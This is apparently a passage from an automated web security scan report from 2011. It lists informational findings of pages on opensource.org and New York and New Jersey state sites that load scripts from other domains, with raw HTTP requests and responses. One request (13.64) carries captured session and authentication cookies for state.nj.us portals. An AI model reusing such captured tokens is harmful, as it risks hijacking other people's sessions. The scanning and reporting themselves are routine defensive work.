<div id="conditional-livestream"><script src="http://static.mogulus.com/scripts/playerv2.js?channel=nysenate&amp;layout=playerEmbedDefault&amp;backgroundColor=0xffffff&amp;backgroundAlpha=1&amp;backgroundGradientStrength=0&amp;chromeColor=0x000000&amp;headerBarGlossEnabled=true&amp;controlBarGlossEnabled=true&amp;chatInputGlossEnabled=false&amp;uiWhite=true&amp;uiAlpha=0.5&amp;uiSelectedAlpha=1&amp;dropShadowEnabled=true&amp;dropShadowHorizontalDistance=10&amp;dropShadowVerticalDistance=10&amp;paddingLeft=0&amp;paddingRight=0&amp;paddingTop=0&amp;paddingBottom=0&amp;cornerRadius=3&amp;backToDirectoryURL=null&amp;bannerURL=null&amp;bannerText=null&amp;bannerWidth=320&amp;bannerHeight=50&amp;showViewers=true&amp;embedEnabled=true&amp;chatEnabled=false&amp;onDemandEnabled=true&amp;programGuideEnabled=false&amp;fullScreenEnabled=true&amp;reportAbuseEnabled=false&amp;gridEnabled=false&amp;initialIsOn=false&amp;initialIsMute=false&amp;initialVolume=10&amp;contentId=null&amp;initThumbUrl=null&amp;playeraspectwidth=4&amp;playeraspectheight=3&amp;mogulusLogoEnabled=false&amp;width=270&amp;height=211&amp;wmode=window" type="text/javascript"></script>
...[SNIP]...

13.49. http://www.opensource.org/licenses/gpl-3.0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-3.0.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:16 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:46 GMT
ETag: "e73d99926e74ae2d28e0d29f4e2b995f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

13.50. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:15 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:29 GMT
ETag: "e3748fe2bbaca53c3b673355a01e8f37"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

13.51. http://www.osc.state.ny.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osc.state.ny.us
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.osc.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 21156
Content-Type: text/html
Content-Location: http://www.osc.state.ny.us/index.htm
Last-Modified: Thu, 07 Jul 2011 15:10:59 GMT
Accept-Ranges: bytes
ETag: "e5c02d14b83ccc1:11aa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:50:16 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js"></script>
...[SNIP]...

13.52. http://www.osc.state.ny.us/ouf/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.osc.state.ny.us
Path:   /ouf/index.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ouf/index.htm HTTP/1.1
Host: www.osc.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 14133
Content-Type: text/html
Last-Modified: Thu, 07 Jul 2011 10:45:28 GMT
Accept-Ranges: bytes
ETag: "b498b7fc923ccc1:11aa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:50:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js"></script>
...[SNIP]...

13.53. http://www.search.state.ny.us/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.search.state.ny.us
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?access=p&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&client=nystate_frontend&proxystylesheet=nystate_frontend&proxycustom=<ADVANCED/> HTTP/1.1
Host: www.search.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Connection: Close
Content-Type: text/html
Cache-Control: public, max-age=31622400
Expires: Fri, 13 Jul 2012 01:50:17 GMT
Content-Length: 32574

<html><head>
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/wireframe.css" media="screen">
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/nysbanner.css" media="screen"><script language="JavaScript" type="text/javascript" src="http://www.nysegov.com/leftMenu.js"></script>
...[SNIP]...
<body onload="setFocus()" dir="ltr"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.54. http://www.state.nj.us/lottery/about/6-0_about.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/about/6-0_about.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/about/6-0_about.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:25 GMT
Content-length: 48579
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 11:52:45 GMT
Etag: "bdc3-4e0db50d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.55. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/didiwin/8-0_did_i_win.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/didiwin/8-0_did_i_win.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:28 GMT
Content-length: 20646
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 15:29:01 GMT
Etag: "50a6-4e1c683d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.56. http://www.state.nj.us/lottery/games/1-0_numbers_draw_games.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-0_numbers_draw_games.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-0_numbers_draw_games.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 13087
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 19:14:37 GMT
Etag: "331f-4e1b4b9d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.57. http://www.state.nj.us/lottery/games/1-1_powerball.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-1_powerball.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-1_powerball.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.58. http://www.state.nj.us/lottery/games/1-2_mega_millions.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-2_mega_millions.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-2_mega_millions.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:19 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.59. http://www.state.nj.us/lottery/games/1-3_pick6.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-3_pick6.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-3_pick6.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:19 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.60. http://www.state.nj.us/lottery/games/1-4_jersey_cash5.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-4_jersey_cash5.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-4_jersey_cash5.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:20 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.61. http://www.state.nj.us/lottery/games/1-5_pick4.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-5_pick4.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-5_pick4.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:20 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.62. http://www.state.nj.us/lottery/games/1-6_pick3.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-6_pick3.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-6_pick3.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:20 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.63. http://www.state.nj.us/lottery/games/1-7_instant_match.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/games/1-7_instant_match.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/games/1-7_instant_match.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:21 GMT
Content-length: 13968
Content-type: text/html
Last-modified: Mon, 11 Jul 2011 19:14:45 GMT
Etag: "3690-4e1b4ba5"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.64. http://www.state.nj.us/lottery/home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/home.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/home.shtml HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/lottery/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfczfjhoFFDpWNk0ih9CnFjKv6RlTaRw0JXs%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:44:23 GMT
Content-type: text/html
Connection: close
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="style/home.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

13.65. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/instant/2-0_instant_games.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/instant/2-0_instant_games.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:21 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...

13.66. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/multimedia/9-0_multimedia.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/multimedia/9-0_multimedia.htm HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:29 GMT
Content-length: 47620
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 12:04:04 GMT
Etag: "ba04-4e0db7b4"
Accept-ranges: bytes
Connection: close

